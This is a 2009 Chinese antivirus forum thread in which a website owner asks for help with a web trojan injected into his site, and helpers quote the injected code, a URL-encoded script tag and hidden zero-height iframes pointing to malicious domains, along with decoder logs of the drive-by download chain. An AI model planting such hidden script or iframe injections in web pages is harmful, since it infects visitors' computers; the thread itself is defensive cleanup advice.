瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 我的网站被挂"大规模爆发性网马群VII"求帮助

1   1  /  1  页   跳转

[求助] 我的网站被挂"大规模爆发性网马群VII"求帮助

收藏
乐呵呵100
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2009-10-23
  • 来自:
发表于: 2009-10-23 21:29 | 只看楼主 短消息 资料
字号: 1楼

我的网站被挂"大规模爆发性网马群VII"求帮助

这两天很郁闷啊,前段时间发现的挂马现象现在又出现了.补丁也打了.整个网站的程序下到电脑里用瑞星等又查杀不到,为什么传到服务器里又出现"大规模爆发性网马群VII"的提示和拦截,请帮帮啊,自己很菜,只好围着电脑着转圈圈啊. ,请大家帮帮,我的网站地址是WWW.JEMEI.CN我的QQ:331421154,请高手帮看看,不盛感激!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
分享到:
gototop
 
夲號ヱ被ジ盜
头像
叱咤花甲狮
  • 帖子:7083
  • 注册: 2008-08-21
  • 来自:昆仑琼华派
论坛8周年活动礼物就爱不长大论坛9周年纪念冰激凌10温馨圣诞十周年国庆61周年十一周年勋章
发表于: 2009-10-23 22:48 | 短消息 资料
字号: 2楼

回复:我的网站被挂"大规模爆发性网马群VII"求帮助

主页最上边一行<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script src=http://h%6E3%67%70%2Ec%6E></script>
清除带有
http://h%6E3%67%70%2Ec%6E
的代码,我在你那网站主页发现四处

解码后:<script src=http://hn3gp.cn></script>
继续:

<iframe src=http://caq1.8866.org/dszq/2.htm


继续:
<html>
<iframe src=http://33hrf.cn/x2/xx.html width=111 height=0 border=0></iframe>
<br>

能力有限,以下是自动解密
关于:hxxp://33hrf.cn/x2/xx.html解密的日志(自动模式 -  18):

AUTO>http://33hrf.cn/x2/14.js
AUTO>http://33hrf.cn/x2/15.js
AUTO>http://33hrf.cn/x2/17.js
AUTO>http://33hrf.cn/x2/16.js
AUTO>http://33hrf.cn/x2/18.js
AUTO>http://33hrf.cn/x2/01.js
AUTO>http://33hrf.cn/x2/02.js
AUTO>http://33hrf.cn/x2/ytfl1.htm
AUTO>http://33hrf.cn/x2/of.htm
AUTO>http://33hrf.cn/x2/ytfl.htm
AUTO>http://33hrf.cn/x2/xx.html
AUTO>http://33hrf.cn/x2/td14.htm
AUTO>http://33hrf.cn/x2/yt.htm
AUTO>http://33hrf.cn/x2/td09.htm
AUTO>http://33hrf.cn/x2/yut.htm
AUTO>http://33hrf.cn/x2/ytu.htm
AUTO>http://33hrf.cn/x2/14.js
AUTO>http://d.lnxwy.com/xx/x2.css

日志由 Redoce1.9第36次修正版于 2009-10-23 22:46:11 生成。
gototop
 
是昔流芳
头像
卡卡反病毒小组
  • 帖子:646
  • 注册: 2009-05-10
  • 来自:青鸾峰
发表于: 2009-10-23 22:49 | 短消息 资料
字号: 3楼

回复:我的网站被挂"大规模爆发性网马群VII"求帮助

关于:hxxp://www.jemei.cn/解密的日志(全体输出 -  20):

Level  0>http://www.jemei.cn/
Level  1>http://hn3gp.cn
Level  2>http://caq1.8866.org/dszq/2.htm
Level  3>http://js.tongji.linezing.com/1240663/tongji.js
Level  3>http://33hrf.cn/x2/xx.html
Level  4>http://33hrf.cn/x2/ytu.htm
Level  5>http://33hrf.cn/x2/ytfl.htm
Level  6>http://33hrf.cn/x2/ff.html
Level  7>http://33hrf.cn/x2/ff.js
Level  8>http://d.lnxwy.com/xx/x2.css  ●
Level  7>http://33hrf.cn/x2/xp.swf  ●
Level  7>http://33hrf.cn/x2/done.swf  ●
Level  6>http://33hrf.cn/x2/ie.html
Level  4>http://33hrf.cn/x2/yut.htm
Level  4>http://33hrf.cn/x2/td09.htm
Level  4>http://33hrf.cn/x2/yt.htm
Level  4>http://33hrf.cn/x2/td14.htm
Level  1>http://www.jemei.cn/a
Level  1>http://www.jemei.cn/images/left_pro.jpg
Level  1>http://webpresence.qq.com/getonline?type=1&331421154:838824483:452869544:

网页分析:是昔流芳

尝试使用iframekill清除挂链
最后编辑是昔流芳 最后编辑于 2009-10-23 22:50:15
My Blog
gototop
 
乐呵呵100
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2009-10-23
  • 来自:
发表于: 2009-10-24 09:06 | 只看楼主 短消息 资料
字号: 4楼

回复:我的网站被挂"大规模爆发性网马群VII"求帮助

谢谢两位!
终于解决了!
再次感谢!!
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT